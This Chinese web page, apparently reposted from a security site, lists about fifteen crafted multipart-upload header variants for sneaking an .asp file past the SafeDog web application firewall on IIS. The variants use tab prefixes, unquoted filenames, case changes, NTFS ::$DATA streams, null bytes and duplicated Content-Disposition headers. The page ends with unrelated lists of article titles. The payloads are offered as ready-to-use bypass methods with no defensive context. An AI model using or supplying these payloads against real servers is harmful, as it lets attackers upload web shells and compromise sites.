原文链接: https://www.cesafe.com/8411.html

原始请求包:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”

Content-Type: text/html

方法1,文件名前缀加[0x09]绕过: 

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”[0x09]cesafe.asp”

Content-Type: text/html

方法2,文件名去掉双引号绕过:

 ——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=cesafe.asp

Content-Type: text/html

方法3,添加一个filename1的文件名参数,并赋值绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”;filename1=”test.jpg”

Content-Type: text/html

方法4,form变量改成f+orm组合绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: f+orm-data; name=”filepath”;filename=”cesafe.asp”

Content-Type: text/html

方法5,文件名后缀大小写绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.Asp”

Content-Type: text/html

方法6,去掉form-data变量绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

 ConTent-Disposition: name=”filepath”; filename=”cesafe.asp”

 Content-Type: text/html

方法7,在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data      ; name=”filepath”; filename=“cesafe.asp”

Content-Type: text/html

方法8,cesafe.asp . (空格+.)绕过:

 ——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp .”

Content-Type: text/html

方法9,“回车换行,绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp ”

Content-Type: text/html

方法10,NTFS流 在文件名后加::$DATA绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp::$DATA” Content-Type: text/html

OR

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp::$DATA\0x00\fuck.asp0x00.jpg”

Content-Type: text/html

方法11,经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传cesafe.asp成功]:

Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp” —————————–

Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.txt”

Content-Type: application/octet-stream

Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp”

Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp”

方法12,将Content-Type和ConTent-Disposition调换顺序位置绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Type: text/html

ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”

方法13,在文件名前缀加空格(tab键可替换)绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=    “cesafe.asp”

Content-Type: text/html

方法14,在form-data前加空格绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data;name=”uploaded”; filename=”cesafe.asp”

Content-Type: text/html

方法15,在form-data的前或后加上+绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: +form-data; name=”filepath”; filename=”cesafe.asp”

Content-Type: text/html

参考:https://www.cesafe.com/8411.html

最新文章

  1. c调用python
  2. python 学习笔记12(序列常用方法总结)
  3. visual studio2010复制粘贴源代码到Word时乱码问题 分类: C# 2014-11-28 09:25 687人阅读 评论(0) 收藏
  4. Kmeans方法
  5. CocoaPods安装第三方出错:XCode7.3
  6. SpringMVC核心——视图渲染(包含视图解析)问题
  7. Struts2(十七)验证框架二
  8. C#中的yield return与Unity中的Coroutine(协程)(上)
  9. SSH整合之spring整合hibernate
  10. RouterOS 软路由配置固定IP上网+DHCP
  11. 关于JDK的配置
  12. 用DependanceProperty做Dynamic换Icon
  13. 关于日历控件My97DatePicker 在IE6下出现“无法打开站点,已终止操作”
  14. 管理员权限dropfiles和copydata小时失败问题
  15. add.fun.php
  16. cowboy rest
  17. 网络唤醒全攻略(Wake On Lan)
  18. 单片机开发——03工欲善其事必先利其器(AD软件安装破解)
  19. JS 作用域(执行环境)与作用链---JS 学习笔记(二)
  20. Xamarin 简化的Android密钥库签名

热门文章

  1. Java笔记---枚举类和注解
  2. HTML——label标签
  3. [WPF 自定义控件]创建包含CheckBox的ListBoxItem
  4. 《果壳中的C# C# 5.0 权威指南》 - 学习笔记
  5. Java自学-多线程 线程安全的类
  6. UML之二、建模元素(1)
  7. 【STM32H7教程】第47章 STM32H7的FMC总线基础知识和HAL库API
  8. M5310-A 版本
  9. 没有正确配置扫描包,提示spring的bean不存在
  10. Angular4.0环境搭建